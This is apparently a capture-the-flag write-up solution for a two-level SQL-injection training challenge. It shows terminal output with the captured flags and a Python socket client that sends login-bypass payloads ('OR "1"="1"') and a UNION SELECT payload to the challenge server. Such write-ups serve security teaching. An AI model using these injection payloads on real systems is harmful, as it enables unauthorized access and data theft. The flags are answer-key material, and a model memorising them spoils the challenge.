root@kali:~/Downloads# python client.py
[+] Test level1 ...
Welcome on level 1 !
Welcome b'admin" OR "1"="1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 … Welcome on level 2 !
Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}
Code source : client.py
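#encoding: utf-8
"""Client for a two-level SQL-injection training challenge (write-up solution).

Each test opens a TCP connection to the challenge server, sends one request
(a single level-selector byte followed by that level's fields) and prints the
server's answer.

The field values are the ones recorded in the write-up. They change the
server's answer only because the server appears to paste the received fields
straight into its SQL text; a server that binds them as query parameters
would treat them as ordinary data.
"""
import socket
import sys

# change this if needed
HOST = '192.168.1.19'
# change this if needed
# NOTE: despite its name, IP holds the TCP port of the challenge service.
IP = 8096


def create_socket():
    """Return a TCP socket connected to (HOST, IP) with a 1-second timeout.

    Any failure is printed to stdout and ends the process with exit status 1.
    """
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect((HOST, IP))
    except Exception as e:
        print("Can't open socket !")
        print(e)
        # Release the descriptor before exiting if the socket was created.
        if s is not None:
            s.close()
        sys.exit(1)
    return s


def _build_request(level, *fields):
    """Return the request bytes: the level byte, then the fields joined by NUL.

    The message is assembled as text and encoded once. The original level-2
    code applied ``%`` to a bytes literal with a str argument, which raises
    TypeError on Python 3.
    """
    return (chr(level) + "\x00".join(fields)).encode('utf-8')


def _run_level(label, request):
    """Send *request* on a fresh connection and print the server's replies.

    A reply starting with "Welcome" is printed and followed by a second read
    for the result line; any other reply prints the fallback message.
    """
    print("[+] Test %s ..." % label)
    s = create_socket()
    try:
        # sendall() retries until the whole request has been written.
        s.sendall(request)
        msg = s.recv(1024)
        if msg and msg.decode('utf-8').startswith("Welcome"):
            print(msg.decode('utf-8'))
            res = s.recv(1024)
            print(res.decode('utf-8'))
        else:
            print("If you called a valid level, notice an admin")
    except socket.timeout:
        # The 1-second timeout set in create_socket() expired on a read.
        print("Timed out waiting for the server")
    finally:
        # Close the connection on every path, including exceptions.
        s.close()


def test_level1():
    """Run level 1: send the login and password fields and print the reply."""
    login = 'admin" OR "1"="1'
    password = 'toto" OR "1"="1" LIMIT "1" OFFSET "2'
    _run_level("level1", _build_request(1, login, password))


def test_level2():
    """Run level 2: send the citation field and print the reply."""
    citation = '123 union SELECT * fROM flag'
    _run_level("level2", _build_request(2, citation))


if __name__ == '__main__':
    test_level1()
    print("")
    test_level2()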